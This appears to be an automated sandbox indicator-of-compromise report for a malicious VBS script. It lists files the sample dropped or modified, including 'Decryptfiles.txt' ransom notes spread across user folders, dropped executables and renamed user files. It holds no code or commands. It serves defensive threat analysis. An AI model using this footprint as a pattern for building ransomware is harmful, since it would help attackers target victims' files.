IOC Report
NOTIFICATION_OF_DEPENDANTS_1.vbs

loading gif

Files

File Path
Type
Category
Malicious
NOTIFICATION_OF_DEPENDANTS_1.vbs
ASCII text
initial sample
malicious
C:\Users\Public\AccountPictures\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\Public\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\Public\Documents\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\Public\Downloads\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\Public\Libraries\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\Public\Libraries\RecordedTV.library-ms
data
modified
malicious
C:\Users\Public\Music\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\Public\Pictures\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\Public\Videos\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\.curlrc.SuMh
data
dropped
malicious
C:\Users\user\.ms-ad\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\3D Objects\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
malicious
C:\Users\user\AppData\Local\Temp\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_10rclwu2.hdm.ps1
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3iigs5yg.am1.psm1
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3nxkjeth.jqb.psm1
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aakjs4su.ynx.psm1
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c5gy5d2y.w0s.ps1
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ce5tmog3.w5r.ps1
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cmijsyeu.ejv.ps1
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_czjtfiqo.ezw.psm1
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dd4cmrln.ljv.ps1
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_muq24lzp.1ro.psm1
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tmgfecbn.m42.psm1
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wt0cmllf.f1b.ps1
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y25lwppa.tsg.psm1
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zdqsw1gs.ytr.ps1
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\eryy65ty.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\fjeljies.cpl
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\.curlrc.echn
data
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Collab\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Forms\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData
data
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings
data
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
data
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
data
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store
data
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei
data
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storek
data
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata
data
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMDocs.sav
data
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMGrpPrm.sav
data
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\Preflight Acrobat Continuous\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\CRLogs\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\CRLogs\crashlogs\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Flash Player\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Flash Player\NativeCache\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Headlights\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Linguistics\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\LogTransport2CC\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\LogTransport2\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\RTTransfer\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Sonar\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Sonar\SonarCC\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\AddIns\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Credentials\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Crypto\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Crypto\Keys\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Crypto\Keys\de7cf8a7901d2ad13e5c67c29e5d1662_9e146be9-c76a-4720-bcdb-53011b87bd06
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Excel\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\rasphone.pbk.XxpC
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Network\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Protect\CREDHIST
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Protect\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\0837c0eb-5e12-485a-b8a4-e50f73c1d92b
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\Preferred
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Speech\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Spelling\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\AppContainerUserCertRead.bEiR
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Vault\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\AccountPictures\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\CloudStore\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\CameraRoll.library-ms
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Documents.library-ms
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Music.library-ms
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Pictures.library-ms
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\SavedPictures.library-ms
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Videos.library-ms
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent Items\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AQRFEVRTGL.png
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
Composite Document File V2 Document, Cannot read section info
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BQJUWOYRTO.jpg
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BWETZDQDIB.mp3
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BYIMNPJCRL.png
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DUKNXICOZT.pdf
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DWTHNHNNJB.docx
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DWTHNHNNJB.jpg
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DWTHNHNNJB.xlsx
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFDEXQWKNW.mp3
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFDEXQWKNW.pdf
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GNLQNHOLWB.docx
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GNLQNHOLWB.mp3
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GNLQNHOLWB.xlsx
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HMPPSXQPQV.docx
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HMPPSXQPQV.jpg
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HMPPSXQPQV.xlsx
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HQJBRDYKDE.png
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HTQYAMNJFK.mp3
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\IYEPUIQXSK.jpg
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\IYEPUIQXSK.xlsx
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LFOPODGVOH.docx
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LFOPODGVOH.xlsx
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LHEPQPGEWF.mp3
byte-swapped Berkeley vfont data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LHEPQPGEWF.pdf
DOS executable (COM, 0x8C-variant)
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LHEPQPGEWF.pdf.Targ (copy)
DOS executable (COM, 0x8C-variant)
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LIJDSFKJZG.docx
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LIJDSFKJZG.pdf
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MSTILBICVO.pdf
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NFUBSOKSVH.png
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NRIABABLWZ.png
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\OOJWCGHFZE.mp3
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\OOJWCGHFZE.xlsx
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PWZOQIFCAN.png
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QFAPOWPAFG.jpg
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SNIPGPPREP.docx
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UJDGSZVRAQ.png
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UNKRLCVOHV.docx
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VEPKBVANJO.jpg
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VWDFPKGDUF.pdf
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VWDFPKGDUF.xlsx
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Compressed (zipped) Folder.ZFSendToTarget.mHle
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Desktop (create shortcut).DeskLink.BxTm
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Documents.mydocs.hcyU
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Mail Recipient.MAPIMail.vgZW
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Extensions\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending Pings\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\AlternateServices.txt
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\ExperimentStoreData.json
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\SiteSecurityServiceState.txt
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\addonStartup.json.lz4
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\addons.json
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\bookmarkbackups\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\compatibility.ini
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\containers.json
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\content-prefs.sqlite
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-wal.FoaS
DOS executable (COM, 0x8C-variant)
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\events\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690337.3be89113-af2b-4b48-9c47-40ac1156f7a2.new-profile.jsonlz4
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690340.2824c836-2afd-4a95-940b-ed2b991ba55d.event.jsonlz4
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690344.6260e81e-5ef5-4137-a0a5-7930ea6f0a75.main.jsonlz4
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690347.6786f292-c1be-4996-99cd-77aa855c1844.first-shutdown.jsonlz4
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695562.2c8e5eea-375d-48a9-ad4c-be583ff1215d.health.jsonlz4
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695606.ff032c8b-05e6-43c9-9e84-732dbe7aca27.event.jsonlz4
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695610.18a05d94-e006-440f-b702-3e398a280dbf.health.jsonlz4
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695614.edd11145-a3b3-4ebf-ba7b-14b7ec08f19f.main.jsonlz4
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\db\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\db\data.safe.bin
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events\background-update
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events\events
data
dropped
malicious
